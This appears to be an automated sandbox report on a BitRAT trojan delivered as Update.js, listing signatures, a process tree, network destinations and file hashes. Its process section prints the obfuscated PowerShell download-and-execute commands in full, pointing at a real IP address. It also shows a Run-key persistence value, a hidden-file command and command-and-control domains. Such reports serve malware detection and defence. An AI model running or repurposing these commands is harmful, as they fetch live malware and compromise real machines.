Malware Analysis Report

2024-09-22 21:58

Sample ID 240425-s2944acb68
Target Update.js
SHA256 8fe424869272394512941904c4b1ba7039ac2a514acb9861e613f5e85222d9a7
Tags
bitrat persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8fe424869272394512941904c4b1ba7039ac2a514acb9861e613f5e85222d9a7

Threat Level: Known bad

The file Update.js was found to be: Known bad.

Malicious Activity Summary

bitrat persistence trojan upx

BitRAT

Blocklisted process makes network request

UPX packed file

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-04-25 15:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-25 15:38

Reported

2024-04-25 15:41

Platform

win11-20240412-en

Max time kernel

148s

Max time network

150s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\Update.js

Signatures

BitRAT

trojan bitrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "wscript //E:VBScript C:\\Users\\Public\\0x.log //Nologo" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 4660 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 4660 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 888 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 888 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 888 wrote to memory of 4076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4660 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1672 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4660 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4660 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Update.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log

C:\Windows\system32\attrib.exe

attrib +h C:\Users\Public\0x.log

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
RU 77.221.151.31:80 77.221.151.31 tcp
RU 77.221.151.31:80 77.221.151.31 tcp
US 8.8.8.8:53 31.151.221.77.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 172.67.163.209:443 strollheavengwu.shop tcp
US 172.67.150.207:443 productivelookewr.shop tcp
US 104.21.89.202:443 tolerateilusidjukl.shop tcp
US 8.8.8.8:53 209.163.67.172.in-addr.arpa udp
US 8.8.8.8:53 207.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 202.89.21.104.in-addr.arpa udp
US 172.67.169.43:443 shatterbreathepsw.shop tcp
US 104.21.16.225:443 shortsvelventysjo.shop tcp
US 104.21.86.106:443 incredibleextedwj.shop tcp
US 172.67.157.23:443 alcojoldwograpciw.shop tcp
US 172.67.192.138:443 liabilitynighstjsko.shop tcp
US 172.67.147.169:443 demonstationfukewko.shop tcp
RU 77.221.151.31:4444 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4kghkgs.mvm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4660-8-0x000001C72A820000-0x000001C72A842000-memory.dmp

memory/4660-17-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/4660-18-0x000001C742CB0000-0x000001C742CC0000-memory.dmp

memory/888-19-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/888-20-0x000001A174AD0000-0x000001A174AE0000-memory.dmp

memory/888-21-0x000001A174AD0000-0x000001A174AE0000-memory.dmp

memory/4660-22-0x000001C742CB0000-0x000001C742CC0000-memory.dmp

memory/888-24-0x000001A175230000-0x000001A17523E000-memory.dmp

memory/4076-25-0x0000000000400000-0x000000000044E000-memory.dmp

memory/888-29-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/4076-30-0x0000000000400000-0x000000000044E000-memory.dmp

memory/4076-31-0x0000000000400000-0x000000000044E000-memory.dmp

C:\Users\Public\0x.log

MD5 d2e9de8671fd61605ff5f8b8f3249d6b
SHA1 38dc0accb9c561c4f2ed9cc565f73a09eb84e81c
SHA256 fcdaa801a02c05faa8e09a1abb75ab4b8b4a57e1d097cc5feb63b95280230e5c
SHA512 413abbf5eb1a19fec41bbf31cfa524a8c88f049ae624c2b8f8cd40b3dc6ca37b99a45e74cfcb3422bee104e218ebc6b3d38f22b5b9afbd967545aa862b15a106

memory/2060-33-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-34-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-35-0x0000000000400000-0x00000000007D3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b9c200437ca6453c1a7a66285ebbc98
SHA1 238f1e7629bc0c371ba4fa3f0bb335302b21d909
SHA256 e98bf0b04cdec1745689b16cccbae66f1ad977f178968736dbfc9a8f0f08c5ff
SHA512 12c183cb8b99867d85a982066629267ce110dccc455a8a62bb1d9175db84aa603ba9a18b7e3fed99d84e94ccffe78af284f7743df46753057bcaefda94c55926

memory/2060-39-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-41-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/4660-40-0x00007FFAA9530000-0x00007FFAA9FF2000-memory.dmp

memory/4076-42-0x0000000000400000-0x000000000044E000-memory.dmp

memory/2060-43-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-44-0x0000000074570000-0x00000000745AC000-memory.dmp

memory/2060-45-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-46-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-47-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-48-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-49-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-50-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-51-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-52-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-53-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-54-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-55-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-57-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-58-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-59-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-61-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-60-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-62-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-63-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-64-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-65-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-66-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-67-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-68-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-69-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-70-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-72-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-74-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-75-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-77-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-79-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-81-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-83-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-85-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-86-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-87-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-89-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-90-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-91-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-93-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-94-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-95-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-97-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-99-0x0000000000400000-0x00000000007D3000-memory.dmp

memory/2060-101-0x0000000000400000-0x00000000007D3000-memory.dmp